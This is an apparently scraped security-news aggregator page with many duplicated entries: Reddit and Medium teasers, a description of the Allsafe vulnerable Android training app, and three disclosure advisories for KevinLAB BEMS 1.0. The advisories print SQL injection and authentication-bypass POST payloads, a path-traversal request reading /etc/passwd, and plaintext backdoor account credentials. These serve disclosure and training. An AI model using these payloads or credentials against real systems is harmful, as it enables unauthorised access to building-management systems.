Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Researchers Discovered The New Threat Group Targeting Linux Servers For Crypto Jacking.
https://cdn-images-1.medium.com/max/900/0*ARtLvjxRTbXS9abJ
Security researchers from Bitdefender have identified a new threat group targeting Linux machines which are configured with weak…
Continue reading on Medium »
Researchers Discovered The New Threat Group Targeting Linux Servers For Crypto Jacking.
https://cdn-images-1.medium.com/max/900/0*ARtLvjxRTbXS9abJ
Security researchers from Bitdefender have identified a new threat group targeting Linux machines which are configured with weak…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How Biohackers Try to Update Their Minds, Bodies, and Human Nature
https://cdn-images-1.medium.com/max/1125/0*aM51DFGNbvFW-2r2
You have probably even come across some version when you have not heard the term “biohacking” before. You may have seen Twitter CEO Jack…
Continue reading on Medium »
How Biohackers Try to Update Their Minds, Bodies, and Human Nature
https://cdn-images-1.medium.com/max/1125/0*aM51DFGNbvFW-2r2
You have probably even come across some version when you have not heard the term “biohacking” before. You may have seen Twitter CEO Jack…
Continue reading on Medium »
Is this a good career path?
https://www.reddit.com/r/Pentesting/comments/ooai0t/is_this_a_good_career_path/
<!-- SC_OFF -->Currently work as a pentester and thinking of giving it up to go back to the devsecops work I was doing previously. From what I've seen and from talking to others in the field most of assessments have involved just running nessus scans and calling it a pentest or just performing one for the compliance check box. I have also dealt with plenty of clients that claim everything is a false positive and argue everything. Is this the norm? Anyone have a different perceptive or have any advice? <!-- SC_ON --> submitted by /u/mountainhacker1 (https://www.reddit.com/user/mountainhacker1)
[link] (https://www.reddit.com/r/Pentesting/comments/ooai0t/is_this_a_good_career_path/) [comments] (https://www.reddit.com/r/Pentesting/comments/ooai0t/is_this_a_good_career_path/)
https://www.reddit.com/r/Pentesting/comments/ooai0t/is_this_a_good_career_path/
<!-- SC_OFF -->Currently work as a pentester and thinking of giving it up to go back to the devsecops work I was doing previously. From what I've seen and from talking to others in the field most of assessments have involved just running nessus scans and calling it a pentest or just performing one for the compliance check box. I have also dealt with plenty of clients that claim everything is a false positive and argue everything. Is this the norm? Anyone have a different perceptive or have any advice? <!-- SC_ON --> submitted by /u/mountainhacker1 (https://www.reddit.com/user/mountainhacker1)
[link] (https://www.reddit.com/r/Pentesting/comments/ooai0t/is_this_a_good_career_path/) [comments] (https://www.reddit.com/r/Pentesting/comments/ooai0t/is_this_a_good_career_path/)
Deep Web
can you please let people help me or you tell me on which page can i ask that
for the final thesis I am working on the topic of deep web and economics, so the central part of the thesis must be about economics. Can anyone tell me what I could write about? I've been thinking about cryptocurrencies, I'm just not sure.
submitted by /u/No-Addendum-1842
[link] [comments]
can you please let people help me or you tell me on which page can i ask that
for the final thesis I am working on the topic of deep web and economics, so the central part of the thesis must be about economics. Can anyone tell me what I could write about? I've been thinking about cryptocurrencies, I'm just not sure.
submitted by /u/No-Addendum-1842
[link] [comments]
reddit
r/deepweb - can you please let people help me or you tell me on which page can i ask that
2 votes and 1 comment so far on Reddit
Allsafe - Intentionally Vulnerable Android Application
http://www.kitploit.com/2021/07/allsafe-intentionally-vulnerable.html
http://www.kitploit.com/2021/07/allsafe-intentionally-vulnerable.html
Allsafe is an intentionally vulnerable application (https://www.kitploit.com/search/label/Vulnerable%20Application) that contains various vulnerabilities. Unlike other vulnerable Android apps, this one is less like a CTF and more like a real-life application that uses modern libraries and technologies. Additionally, I have included some Frida based challenges for you to explore. Have fun and happy hacking!
Useful Frida Scripts
I have my Frida scripts (more like templates) in other repository. I'm sure they might be quite handy for the Frida related tasks. Check it out: https://github.com/t0thkr1s/frida
Tasks / Vulnerabilities
1. Insecure Logging
Simple information disclosure (https://www.kitploit.com/search/label/Information%20Disclosure) vulnerability. Use the logcat command-line tool to discover sensitive information.
Resources & HackerOne Reports:
Logcat Tool (https://developer.android.com/studio/command-line/logcat) Coinbase OAuth Response Code Leak (https://hackerone.com/reports/5314)
2. Hardcoded Credentials
Some credentials are left in the code. Your task is to reverse engineer (https://www.kitploit.com/search/label/Reverse%20Engineer) the app and find sensitive information.
Resources & HackerOne Reports:
Zomato Hardcoded Credentials (https://hackerone.com/reports/246995) 8x8 Hardcoded Credentials (https://hackerone.com/reports/412772) Reverb Hardcoded API Secret (https://hackerone.com/reports/351555)
3. Root Detection
This is purely for Frida practice. Make the code believe that you device is not rooted!
4. Arbitrary Code Execution
Loading modules securely with third-party apps are not easy. Write a PoC application and exploit the vulnerability!
Resources & HackerOne Reports:
Arbitrary Code Execution via Third-Party Package Contexts (https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts/)
5. Secure Flag Bypass
Another Frida-based task. No real vulnerability (https://www.kitploit.com/search/label/Vulnerability) here, just have fun bypassing the secure flag!
Resources & HackerOne Reports:
Android FLAG_SECURE Reference (https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE)
6. Certificate Pinning (https://www.kitploit.com/search/label/Certificate%20Pinning) Bypass
Certificate pinning is implemented using the OkHttp library. You have to bypass it in order to view the traffic with Burp Suite.
Resources & HackerOne Reports:
Certificate and Public Key Pinning (https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning) Coinbase Vulnerabilities (https://hackerone.com/reports/5786)
7. Insecure Broadcast Receiver
There's a vulnerable broadcast recevier in the application. Trigger it with the correct data and you're done!
Resources & HackerOne Reports:
Android Broadcasts Overview (https://developer.android.com/guide/components/broadcasts) ok.ru Broadcast Receiver Exploitation (https://hackerone.com/reports/97295) Bitwarden Vulnerable Broadcast Receiver (https://hackerone.com/reports/289000)
8. Deep Link Exploitation
Similar to the insecure broadcast receiver, you need to provide the right query parameter to complete this task!
Resources & HackerOne Reports:
Android Deep Linking (https://developer.android.com/training/app-links/deep-linking) Grab Insecure Deep Link (https://hackerone.com/reports/401793) Periscope Deep Link CSRF (https://hackerone.com/reports/583987)
9. SQL Injection
Just a regular SQL injection that you'd find in web applications. No need to reverse the code to bypass the login mechanism.
Resources & HackerOne Reports:
SQL Injection in Content Provider (https://hackerone.com/reports/291764) Show me how it's done!
# TODO
10. Vulnerable WebView
You can also complete this task without decompiling the application. Pop an alert dialog and read files!
Resources & HackerOne Reports:
Useful Frida Scripts
I have my Frida scripts (more like templates) in other repository. I'm sure they might be quite handy for the Frida related tasks. Check it out: https://github.com/t0thkr1s/frida
Tasks / Vulnerabilities
1. Insecure Logging
Simple information disclosure (https://www.kitploit.com/search/label/Information%20Disclosure) vulnerability. Use the logcat command-line tool to discover sensitive information.
Resources & HackerOne Reports:
Logcat Tool (https://developer.android.com/studio/command-line/logcat) Coinbase OAuth Response Code Leak (https://hackerone.com/reports/5314)
2. Hardcoded Credentials
Some credentials are left in the code. Your task is to reverse engineer (https://www.kitploit.com/search/label/Reverse%20Engineer) the app and find sensitive information.
Resources & HackerOne Reports:
Zomato Hardcoded Credentials (https://hackerone.com/reports/246995) 8x8 Hardcoded Credentials (https://hackerone.com/reports/412772) Reverb Hardcoded API Secret (https://hackerone.com/reports/351555)
3. Root Detection
This is purely for Frida practice. Make the code believe that you device is not rooted!
4. Arbitrary Code Execution
Loading modules securely with third-party apps are not easy. Write a PoC application and exploit the vulnerability!
Resources & HackerOne Reports:
Arbitrary Code Execution via Third-Party Package Contexts (https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts/)
5. Secure Flag Bypass
Another Frida-based task. No real vulnerability (https://www.kitploit.com/search/label/Vulnerability) here, just have fun bypassing the secure flag!
Resources & HackerOne Reports:
Android FLAG_SECURE Reference (https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE)
6. Certificate Pinning (https://www.kitploit.com/search/label/Certificate%20Pinning) Bypass
Certificate pinning is implemented using the OkHttp library. You have to bypass it in order to view the traffic with Burp Suite.
Resources & HackerOne Reports:
Certificate and Public Key Pinning (https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning) Coinbase Vulnerabilities (https://hackerone.com/reports/5786)
7. Insecure Broadcast Receiver
There's a vulnerable broadcast recevier in the application. Trigger it with the correct data and you're done!
Resources & HackerOne Reports:
Android Broadcasts Overview (https://developer.android.com/guide/components/broadcasts) ok.ru Broadcast Receiver Exploitation (https://hackerone.com/reports/97295) Bitwarden Vulnerable Broadcast Receiver (https://hackerone.com/reports/289000)
8. Deep Link Exploitation
Similar to the insecure broadcast receiver, you need to provide the right query parameter to complete this task!
Resources & HackerOne Reports:
Android Deep Linking (https://developer.android.com/training/app-links/deep-linking) Grab Insecure Deep Link (https://hackerone.com/reports/401793) Periscope Deep Link CSRF (https://hackerone.com/reports/583987)
9. SQL Injection
Just a regular SQL injection that you'd find in web applications. No need to reverse the code to bypass the login mechanism.
Resources & HackerOne Reports:
SQL Injection in Content Provider (https://hackerone.com/reports/291764) Show me how it's done!
# TODO
10. Vulnerable WebView
You can also complete this task without decompiling the application. Pop an alert dialog and read files!
Resources & HackerOne Reports:
ownCloud WebView XSS (https://hackerone.com/reports/87835)
11. Smali Patching
In this task, you have to modify the execution flow of the application by editing the Smali code. Finally, rebuild and sign the APK!
Resources & HackerOne Reports:
Uber APK Signer (https://github.com/patrickfav/uber-apk-signer)
12. Native Library
The application uses a native library that validates the entered password. Reverse engineer the library to find the password then use Frida to hook the native method.
Resources & HackerOne Reports:
Ghidra (https://github.com/NationalSecurityAgency/ghidra) Cutter (https://github.com/rizinorg/cutter)
Download Allsafe (https://github.com/t0thkr1s/allsafe)
11. Smali Patching
In this task, you have to modify the execution flow of the application by editing the Smali code. Finally, rebuild and sign the APK!
Resources & HackerOne Reports:
Uber APK Signer (https://github.com/patrickfav/uber-apk-signer)
12. Native Library
The application uses a native library that validates the entered password. Reverse engineer the library to find the password then use Frida to hook the native method.
Resources & HackerOne Reports:
Ghidra (https://github.com/NationalSecurityAgency/ghidra) Cutter (https://github.com/rizinorg/cutter)
Download Allsafe (https://github.com/t0thkr1s/allsafe)
Allsafe - Intentionally Vulnerable Android Application
Allsafe is an intentionally vulnerable application that contains various vulnerabilities. Unlike other vulnerable Android apps, this one is less like a CTF and more like a real-life application that uses modern libraries and technologies. Additionally, I have included some Frida based challenges for you to explore. Have fun and happy hacking!Useful Frida Scripts I have my Frida scripts (more like templates) in other repository. I'm sure they might be quite handy for the Frida related tasks. Check it out: https://github.com/t0thkr1s/frida Tasks / Vulnerabilities 1. Insecure Logging Simple information disclosure vulnerability. Use the logcat command-line tool to discover sensitive information. Resources & HackerOne Reports: Logcat Tool Coinbase OAuth Response Code Leak2. Hardcoded Credentials Some credentials are left in the code. Your task is to reverse engineer the app and find sensitive information. Resources & HackerOne Reports: Zomato Hardcoded Credentials 8x8 Hardcoded Credentials Reverb Hardcoded API Secret3. Root Detection This is purely for Frida practice. Make the code believe that you device is not rooted!4. Arbitrary Code Execution Loading modules securely with third-party apps are not easy. Write a PoC application and exploit the vulnerability! Resources & HackerOne Reports: Arbitrary Code Execution via Third-Party Package Contexts5. Secure Flag Bypass Another Frida-based task. No real vulnerability here, just have fun bypassing the secure flag! Resources & HackerOne Reports: Android FLAG_SECURE Reference6. Certificate Pinning Bypass Certificate pinning is implemented using the OkHttp library. You have to bypass it in order to view the traffic with Burp Suite. Resources & HackerOne Reports: Certificate and Public Key Pinning Coinbase Vulnerabilities7. Insecure Broadcast Receiver There's a vulnerable broadcast recevier in the application. Trigger it with the correct data and you're done! Resources & HackerOne Reports: Android Broadcasts Overview ok.ru Broadcast Receiver Exploitation Bitwarden Vulnerable Broadcast Receiver8. Deep Link Exploitation Similar to the insecure broadcast receiver, you need to provide the right query parameter to complete this task! Resources & HackerOne Reports: Android Deep Linking Grab Insecure Deep Link Periscope Deep Link CSRF9. SQL Injection Just a regular SQL injection that you'd find in web applications. No need to reverse the code to bypass the login mechanism. Resources & HackerOne Reports: SQL Injection in Content Provider Show me how it's done! # TODO 10. Vulnerable WebView You can also complete this task without decompiling the application. Pop an alert dialog and read files! Resources & HackerOne Reports: ownCloud WebView XSS11. Smali Patching In this task, you have to modify the execution flow of the application by editing the Smali code. Finally, rebuild and sign the APK! Resources & HackerOne Reports: Uber APK Signer12. Native Library The application uses a native library that validates the entered password. Reverse engineer the library to find the password then use Frida to hook the native method. Resources & HackerOne Reports: Ghidra Cutter Download Allsafe
Read more...
Allsafe is an intentionally vulnerable application that contains various vulnerabilities. Unlike other vulnerable Android apps, this one is less like a CTF and more like a real-life application that uses modern libraries and technologies. Additionally, I have included some Frida based challenges for you to explore. Have fun and happy hacking!Useful Frida Scripts I have my Frida scripts (more like templates) in other repository. I'm sure they might be quite handy for the Frida related tasks. Check it out: https://github.com/t0thkr1s/frida Tasks / Vulnerabilities 1. Insecure Logging Simple information disclosure vulnerability. Use the logcat command-line tool to discover sensitive information. Resources & HackerOne Reports: Logcat Tool Coinbase OAuth Response Code Leak2. Hardcoded Credentials Some credentials are left in the code. Your task is to reverse engineer the app and find sensitive information. Resources & HackerOne Reports: Zomato Hardcoded Credentials 8x8 Hardcoded Credentials Reverb Hardcoded API Secret3. Root Detection This is purely for Frida practice. Make the code believe that you device is not rooted!4. Arbitrary Code Execution Loading modules securely with third-party apps are not easy. Write a PoC application and exploit the vulnerability! Resources & HackerOne Reports: Arbitrary Code Execution via Third-Party Package Contexts5. Secure Flag Bypass Another Frida-based task. No real vulnerability here, just have fun bypassing the secure flag! Resources & HackerOne Reports: Android FLAG_SECURE Reference6. Certificate Pinning Bypass Certificate pinning is implemented using the OkHttp library. You have to bypass it in order to view the traffic with Burp Suite. Resources & HackerOne Reports: Certificate and Public Key Pinning Coinbase Vulnerabilities7. Insecure Broadcast Receiver There's a vulnerable broadcast recevier in the application. Trigger it with the correct data and you're done! Resources & HackerOne Reports: Android Broadcasts Overview ok.ru Broadcast Receiver Exploitation Bitwarden Vulnerable Broadcast Receiver8. Deep Link Exploitation Similar to the insecure broadcast receiver, you need to provide the right query parameter to complete this task! Resources & HackerOne Reports: Android Deep Linking Grab Insecure Deep Link Periscope Deep Link CSRF9. SQL Injection Just a regular SQL injection that you'd find in web applications. No need to reverse the code to bypass the login mechanism. Resources & HackerOne Reports: SQL Injection in Content Provider Show me how it's done! # TODO 10. Vulnerable WebView You can also complete this task without decompiling the application. Pop an alert dialog and read files! Resources & HackerOne Reports: ownCloud WebView XSS11. Smali Patching In this task, you have to modify the execution flow of the application by editing the Smali code. Finally, rebuild and sign the APK! Resources & HackerOne Reports: Uber APK Signer12. Native Library The application uses a native library that validates the entered password. Reverse engineer the library to find the password then use Frida to hook the native method. Resources & HackerOne Reports: Ghidra Cutter Download Allsafe
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Multi-tool device for hackers Flipper Zero started manufacturing! The challenges they face due to COVID semiconductor crisis in the Flipper blog post
https://external-preview.redd.it/JFMMPT8e-90Zp3IpZIaohtf6uQmfFXkNi3WPdO7N31c.jpg?width=640&crop=smart&auto=webp&s=6a1481e42f8087cbbbee92a95bdf913c3e9396b8 submitted by /u/Serega_Barsukov
[link] [comments]
Multi-tool device for hackers Flipper Zero started manufacturing! The challenges they face due to COVID semiconductor crisis in the Flipper blog post
https://external-preview.redd.it/JFMMPT8e-90Zp3IpZIaohtf6uQmfFXkNi3WPdO7N31c.jpg?width=640&crop=smart&auto=webp&s=6a1481e42f8087cbbbee92a95bdf913c3e9396b8 submitted by /u/Serega_Barsukov
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
KevinLAB BEMS 1.0 Unauthenticated SQL Injection / Authentication Bypass
https://1.bp.blogspot.com/-3PgjWVftdQ0/WWlvP-R2mXI/AAAAAAAAIM8/iBQyafDa-iYc-AHcRZlLffBv9_pWsP_-gCLcBGAs/s1600/h30.png
KevinLAB BEMS version 1.0 suffers from an unauthenticated SQL Injection vulnerability. Input passed through input_id POST parameter in /http/index.php is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code to bypass the authentication mechanism.
MD5 |
Download
Source:packetstormsecurity.com
KevinLAB BEMS 1.0 Unauthenticated SQL Injection / Authentication Bypass
https://1.bp.blogspot.com/-3PgjWVftdQ0/WWlvP-R2mXI/AAAAAAAAIM8/iBQyafDa-iYc-AHcRZlLffBv9_pWsP_-gCLcBGAs/s1600/h30.png
KevinLAB BEMS version 1.0 suffers from an unauthenticated SQL Injection vulnerability. Input passed through input_id POST parameter in /http/index.php is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code to bypass the authentication mechanism.
MD5 |
3498bc654a493cbf9b46522829eb067cDownload
KevinLAB BEMS 1.0 Unauthenticated SQL Injection / Authentication Bypass
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
05.07.2021
--
PoC POST data payload (extract):
--------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
PoC POST data payload (authbypass):
-----------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
KevinLAB BEMS 1.0 Authenticated File Path Traversal / Information Disclosure
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
KevinLAB BEMS version 1.0 suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the page GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
MD5 |
Download
Source:packetstormsecurity.com
KevinLAB BEMS 1.0 Authenticated File Path Traversal / Information Disclosure
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
KevinLAB BEMS version 1.0 suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the page GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
MD5 |
4bc3f448faf6a5df2c5354ab9084063bDownload
KevinLAB BEMS 1.0 Authenticated File Path Traversal Information Disclosure
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability.
Input passed through the 'page' GET parameter in index.php is not properly verified
before being used to include files. This can be exploited to disclose the contents
of arbitrary and sensitive files via directory traversal attacks.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5656
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php
05.07.2021
--
GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
...
...
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
KevinLAB BEMS 1.0 Undocumented Backdoor Account
https://3.bp.blogspot.com/-GFxdnkVY0Lw/WWlvniKY45I/AAAAAAAAIRU/77qCibw7l9gJ7HKa7eHBCfMI2N56gMPzwCLcBGAs/s1600/hack_img6.png
KevinLAB BEMS version 1.0 has an undocumented backdoor account and the sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
MD5 |
Download
Source:packetstormsecurity.com
KevinLAB BEMS 1.0 Undocumented Backdoor Account
https://3.bp.blogspot.com/-GFxdnkVY0Lw/WWlvniKY45I/AAAAAAAAIRU/77qCibw7l9gJ7HKa7eHBCfMI2N56gMPzwCLcBGAs/s1600/hack_img6.png
KevinLAB BEMS version 1.0 has an undocumented backdoor account and the sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
MD5 |
a9e653ecb20d44dc4da9b97ffbe54252Download
KevinLAB BEMS 1.0 Undocumented Backdoor Account
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The BEMS solution has an undocumented backdoor account and these sets of
credentials are never exposed to the end-user and cannot be changed through any
normal operation of the solution thru the RMI. Attacker could exploit this
vulnerability by logging in using the backdoor account with highest privileges
for administration and gain full system control. The backdoor user cannot be
seen in the users settings in the admin panel and it also uses an undocumented
privilege level (admin_pk=1) which allows full availability of the features that
the BEMS is offering remotely.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5654
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
05.07.2021
--
Backdoor accounts from the DB:
------------------------------
Username: kevinlab (permission=1)
Password: kevin003
Username: developer1 (permission=6)
Password: 1234
Source:packetstormsecurity.com
Exploit Collector
Dell OpenManage Enterprise Hardcoded Credentails / Privilege Escalation / Deserialization
Dell OpenManage Enterprise Hardcoded Credentails / Privilege Escalation / Deserialization
Kitploit
Dell OpenManage Enterprise Hardcoded Credentails / Privilege Escalation / Deserialization
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.